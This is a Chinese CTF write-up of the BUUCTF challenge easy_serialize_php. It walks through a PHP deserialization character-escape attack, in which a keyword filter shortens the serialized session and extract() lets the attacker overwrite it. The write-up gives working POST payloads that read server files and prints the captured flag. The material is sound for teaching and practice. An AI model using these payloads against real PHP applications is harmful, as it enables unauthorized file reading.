easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
2023-09-27 14:28:02 时间
0x01、Web
1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
第一步:打开题目环境,进入题目链接,代码审计
<?php
$function = @$_GET['f']; //GET传参:f
function filter($img){ //函数:filter(),使用$img传参
$filter_arr = array('php','flag','php5','php4','fl1g'); //黑名单数组
$filter = '/'.implode('|',$filter_arr).'/i'; //在每个元素的值直接拼接|,再赋值给$filter
return preg_replace($filter,'',$img); //不区分大小写,从参数$img的值里面匹配$filter里面的值,替换为空
}
if($_SESSION){ //判断$_SESSION是否存在
unset($_SESSION); //销毁该变量
}
$_SESSION["user"] = 'guest'; //赋值
$_SESSION['function'] = $function; //赋值
extract($_POST); //把数组转为变量,该函数使用数组键名作为变量名,使用数组键值作为变量值,存在变量覆盖漏洞
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION)); //序列化$_SESSION,过滤后,赋值给$serialize_info
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info); //反序列化$serialize_info
echo file_get_contents(base64_decode($userinfo['img']));//base64解码$userinfo,读取以$userinfo为名的文件内容为字符串,再打印
}
第二步:思路
很明显:提示我们传入?f=phpinfo,寻找一些信息,猜测是flag的位置,通过检索一些关键词append、include、root、core、flag,发现了flag文件:d0g3_f1ag.php
图略
倒推法:
既然此时我们知道了flag文件位置:d0g3_f1ag.php,直接访问,或者文件包含都查看不到任何flag值,说明需要读源码咯
想要读取d0g3_f1ag.php源码,就要echo file_get_contents(base64_decode($userinfo['img']))
想要$userinfo,就要unserialize($serialize_info)
想要$serialize_info,就要filter(serialize($_SESSION));
想要$_SESSION,就要extract($_POST);
注意:由于extract($_POST)在赋值的后面,那么就有这两个可控的键值对
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
注意:我们的$_SESSION['img']在extract($_POST)的后面,并不可控
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
注意:filter()函数将传来的参数值内的关键词,替换为空
假如我们POST传入:_SESSION[user]=flag&_SESSION[function]=xxxx
那么在序列化后的过滤的时候,第一个键值对的flag被替换为空,那么第二个键值对的键就被覆盖了,如果合适的话,可能刚刚好让第二个键值对的键充当第一个键值对的值,那么第二个键值对的值就逃逸了出来,假如我们把这个值构造成一个键值对的序列化字符串,就成功的替代了之前的第二个键值对的序列化字符串
但是呢,我们后面还有后台自己赋值的img键值对,我们可以使用}抛弃掉,但是我们再构造的时候前面的一个}被吃掉了,所以不需要再单独添加一个}了
第三步:编写代码,构造payload
#测试变量覆盖漏洞
<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'test';
extract($_POST);
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
var_dump($_SESSION);
//POST提交:_SESSION[user]=123&_SESSION[function]=123
//结果:array(3) { ["user"]=> string(3) "123" ["function"]=> string(3) "123" ["img"]=> string(20) "Z3Vlc3RfaW1nLnBuZw==" }
#构造键值对:
<?php
echo base64_encode('d0g3_f1ag.php')."<br />";
//ZDBnM19mMWFnLnBocA==
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
echo serialize($_SESSION)."<br />";
//a:1:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
//构造成第二个键值对的形式:
//a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
#测试,计算第二个键值对的键长度+2个原始的闭合+构造的一些前缀字符
<?php
$_SESSION['user'] = 'flag';
$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}';
echo serialize($_SESSION)."<br />";
//a:2:{s:4:"user";s:4:"flag";s:8:"function";s:47:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}";}
//a:2:{s:4:"user";s:4:"【";s:8:"function";s:47:"a:1:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}";}
//28个字符
//需要4x7个flag
#测试:28长度的flag+过滤
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagflagflag';
$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
echo filter(serialize($_SESSION))."<br />";
//a:3:{s:4:"user";s:28:"";s:8:"function";s:46:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//分析:
//有效的:a:3:{s:4:"user";s:28:"【";s:8:"function";s:46:"a:1:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
//这些被抛弃的:";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//但是:有一个问题:【a:3:】这里表示了三个啊,但是实际只有两个,那么反序列化的时候必然失败,但是我们又不能手动的修改a:3
//所以,一开始我们就要构造2个键值对
#重新构造两个键值对:
<?php
echo base64_encode('d0g3_f1ag.php')."<br />";
//ZDBnM19mMWFnLnBocA==
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
$_SESSION['chen'] = 'qwsn';
echo serialize($_SESSION)."<br />";
//a:2:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
//构造:
//a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
#再次测试过滤
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagflagflag';
$_SESSION['function'] = 'a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}';
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
echo filter(serialize($_SESSION))."<br />";
//a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//分析:
//a:3:{s:4:"user";s:28:"【";s:8:"function";s:68:"a:2:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//有效:a:3:{s:4:"user";s:28:"【";s:8:"function";s:68:"a:2:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
//抛弃:";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
#反序列化,测试成功
<?php
var_dump(unserialize('a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}'));
//array (size=3)
// 'user' => string '";s:8:"function";s:68:"a:2:{' (length=28)
// 'img' => string 'ZDBnM19mMWFnLnBocA==' (length=20)
// 'chen' => string 'qwsn' (length=4)
$chen = unserialize('a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}');
echo "<br />".base64_decode($chen['img']);
//d0g3_f1ag.php
因此,payload:
GET部分:?f=show_image
POST部分:_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
第四步:提交payload,获取结果
图略
查看页面源码发现:
图略
$flag = ‘flag in /d0g3_fllllllag’;
//很明显:提示flag处于根目录下的d0g3_fllllllag里面
第五步:修改payload
<?php
echo base64_encode('/d0g3_fllllllag')."<br />";
//L2QwZzNfZmxsbGxsbGFn
echo strlen('L2QwZzNfZmxsbGxsbGFn')."<br />";
//20
//很明显,与之前的ZDBnM19mMWFnLnBocA==文件名长度一样
//所以,直接替换即可
payload:
GET部分:?f=show_image
POST部分:_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:4:"chen";s:4:"qwsn";}
第六步:提交我们修改的payload,提交得到flag
图略
flag{261e6e23-e6aa-466a-a77e-24fac42bbe57}
2.总结
1.三个键值对
2.前两个连续可控,第三个不可控
3.先序列化数组,后过滤,关键词变少,这里是置空的情况,导致第一个键值对的值可以覆盖第二个键值对的键,从而使第二个键值对的值逃逸出来,只要我们占用这个值的位置构造出来两个键值对的序列化字符串,一个是第三个键值对(为了搞flag嘛),一个随便(为了满足a:3的格式),这里不需要再去抛弃原有的第三个键值对了,因为第一个键值对的值覆盖了第二个键值对的键的时候导致一个}不再起作用,所以}必然是单数,最后的原有第三个键值对回被抛弃
相关文章
- php之快速入门学习-1
- PHP操作PDO、预处理以及事务
- PHP 替换中文字符的方法
- PHP 性能分析(一): XHProf & XHGui 介绍
- PHP基本语法
- php多域名单站点路由
- 关于php中数据访问的几点补充
- PHP 字符 正则表达式 +,*,?
- 【python】or【php】网页中字符编码转换,将反斜杠u u字符串转为unicode/utf8
- Ubuntu 安装php mcrypt
- 修改 processor.php 文件,监听用户对该应用的消息
- PHP WordPress XFN
- php转换字符编码为utf-8
- php接口开发时,数据解析失败问题,字符转义,编码问题
- windows下开发PHP扩展dll(无需Cygwin)